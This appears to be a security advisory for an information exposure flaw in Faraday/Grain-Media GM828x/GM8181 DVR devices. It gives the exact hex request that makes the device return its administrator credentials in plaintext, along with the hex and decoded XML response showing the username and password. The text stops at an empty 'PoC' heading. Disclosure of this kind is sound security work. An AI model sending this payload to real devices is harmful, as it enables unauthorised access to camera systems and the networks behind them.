Summary

This report outlines a critical security vulnerability identified in Faraday Technology (Grain-Media) GM828x/GM8181 DVR devices. The vulnerability allows an unauthorized attacker to retrieve the device's login credentials by sending a specifically crafted request to the device, affecting over 27,000 Internet-connected devices.

Untitled

Affected Models

CWE

CWE-200 (Information Exposure)

Impact

An attacker leveraging this vulnerability can gain unauthorized access to the DVR system, potentially leading to unauthorized viewing or manipulation of video data, and possibly access to the connected network.

Vulnerability Details

An information exposure vulnerability exists in the GM828x/GM8181 DVR devices. An attacker can exploit this vulnerability by sending a specifically crafted request to the device. The device responds with an XML data structure that includes administrative credentials in plaintext.

Request Payload:

5a5aaa55d3300000f00300000000000002000000010000000000000000000000

Response Payload:

5a5aaa55d3300000f003000001000000000000000000000000000000ff0000003c3f786d6c2076657273696f6e3d22312e3022203f3e0a3c4d6573736167652056657273696f6e3d2231223e0a202020203c4865616465723e0a20202020202020203c757365725f6366672063685f617574685f656e61626c653d2230223e0a2020202020202020202020203c61646d696e206e616d653d2241646d696e2220706173733d223430323233352220617574683d2231352220617574685f63685f6d61736b3d22363535333522202f3e0a2020202020202020202020203c7573657220757365725f636e743d223022202f3e0a20202020202020203c2f757365725f6366673e0a202020203c2f4865616465723e0a3c2f4d6573736167653e00

Decoded XML Response:

<?xml version="1.0" ?>
<Message Version="1">
    <Header>
        <user_cfg ch_auth_enable="0">
            <admin name="Admin" pass="402235" auth="15" auth_ch_mask="65535" />
            <user user_cnt="0" />
        </user_cfg>
    </Header>
</Message>

The response includes the administrator's username (Admin) and password (402235), exposing sensitive information.

PoC